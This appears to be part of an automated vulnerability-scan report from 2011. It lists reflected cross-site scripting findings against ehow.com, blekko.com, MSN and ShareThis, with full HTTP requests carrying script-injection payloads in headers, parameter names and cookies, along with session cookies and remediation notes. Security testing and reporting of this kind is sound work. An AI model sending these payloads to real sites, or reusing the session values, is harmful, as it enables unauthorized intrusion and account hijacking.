Referer: http://www.google.com/search?hl=en&q=a0e92</script><script>alert(1)</script>0488b8fbc31
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:57 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74807
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38ddd</script><script>alert(1)</script>7cb44e64c8b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_7199214_onion-flatbread-recipe.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=38ddd</script><script>alert(1)</script>7cb44e64c8b
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84886
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45ee5</script><script>alert(1)</script>a202cf207b6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=45ee5</script><script>alert(1)</script>a202cf207b6
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 81054
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How To Videos: Instructional, DIY & How To Video ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe1f3</script><script>alert(1)</script>bfeaf58b908 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /weddings-and-parties/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=fe1f3</script><script>alert(1)</script>bfeaf58b908
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72253
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Weddings & Parties - How To Information | eHow.co ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b840b</script><script>alert(1)</script>8ba33d5bdf1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /weight-management-and-body-image/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b840b</script><script>alert(1)</script>8ba33d5bdf1
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72033
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Weight Management & Body Image - How To Informati ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1e97</script><script>alert(1)</script>0fc653e07d5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /winterize-a-garden/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e1e97</script><script>alert(1)</script>0fc653e07d5
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65547
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d4de</script><script>alert(1)</script>62a90938785 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /WebResource.axd HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=3d4de</script><script>alert(1)</script>62a90938785
Response (redirected)
HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 02 Feb 2011 15:46:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28888
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow | How To Do Just About Everything! | How To ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 853b7</script><script>alert(1)</script>acd0c1c1806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/compressed/en-US/common-mXhI4A.css HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=853b7</script><script>alert(1)</script>acd0c1c1806
Response
HTTP/1.1 404 File not Found
Connection: close
Date: Wed, 02 Feb 2011 15:45:53 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28888
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow | How To Do Just About Everything! | How To ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c8de</script><script>alert(1)</script>c257e1020ae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5c8de</script><script>alert(1)</script>c257e1020ae
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:18:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68936
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b77a3</script><script>alert(1)</script>f21f6854d43 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/PasswordRetrieval.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b77a3</script><script>alert(1)</script>f21f6854d43
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:43 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25094
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9816e</script><script>alert(1)</script>c79d7af261c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/Support/DisplayCaptchaImage.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9816e</script><script>alert(1)</script>c79d7af261c
Response (redirected)
HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 02 Feb 2011 15:46:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28888
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow | How To Do Just About Everything! | How To ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d60b6</script><script>alert(1)</script>0dc090f33f6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/signin.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d60b6</script><script>alert(1)</script>0dc090f33f6
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:38 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24325
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Sign In to eHow | eHow.com </title> <meta ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38441</script><script>alert(1)</script>6930395ab2b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=38441</script><script>alert(1)</script>6930395ab2b
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:46:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49154
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36718</script><script>alert(1)</script>f2cd512ee5a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms_use.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=36718</script><script>alert(1)</script>f2cd512ee5a
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:46:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73168
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Terms of Use | eHow.com</title> <meta charset= ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
1.650. http://blekko.com/join [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://blekko.com
Path: /join
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de32a"><script>alert(1)</script>784d2feb8f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /join?de32a"><script>alert(1)</script>784d2feb8f0=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;
The document has moved <a href="https://blekko.com/join?de32a"><script>alert(1)</script>784d2feb8f0=1">here</a>.
1.651. http://blekko.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://blekko.com
Path: /login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a44"><script>alert(1)</script>047c1089db5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /login?f7a44"><script>alert(1)</script>047c1089db5=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;
The document has moved <a href="https://blekko.com/login?f7a44"><script>alert(1)</script>047c1089db5=1">here</a>.
1.652. http://moneycentral.msn.com/investor/home.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://moneycentral.msn.com
Path: /investor/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e5ec"><script>alert(1)</script>f4e8bec2fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /investor/home.aspx?6e5ec"><script>alert(1)</script>f4e8bec2fdd=1 HTTP/1.1
Host: moneycentral.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Feb 2011 15:35:07 GMT
Server: Microsoft-IIS/6.0
Location: http://money.msn.com/investing?6e5ec"><script>alert(1)</script>f4e8bec2fdd=1
Content-Length: 108
object moved <a href="http://money.msn.com/investing?6e5ec"><script>alert(1)</script>f4e8bec2fdd=1">here</a>
The value of the __stid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 585c9"><script>alert(1)</script>a1d1042bd was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?fpc=fa38af9-12dddaf19a7-13ff2714-2&purl=null&jsref= HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.c99a19d7384984446908be08d7b2b8b1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=Cs8yN00nznknhnUGHGW1Ag==585c9"><script>alert(1)</script>a1d1042bd
Response
HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 01 Feb 2011 14:32:02 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 317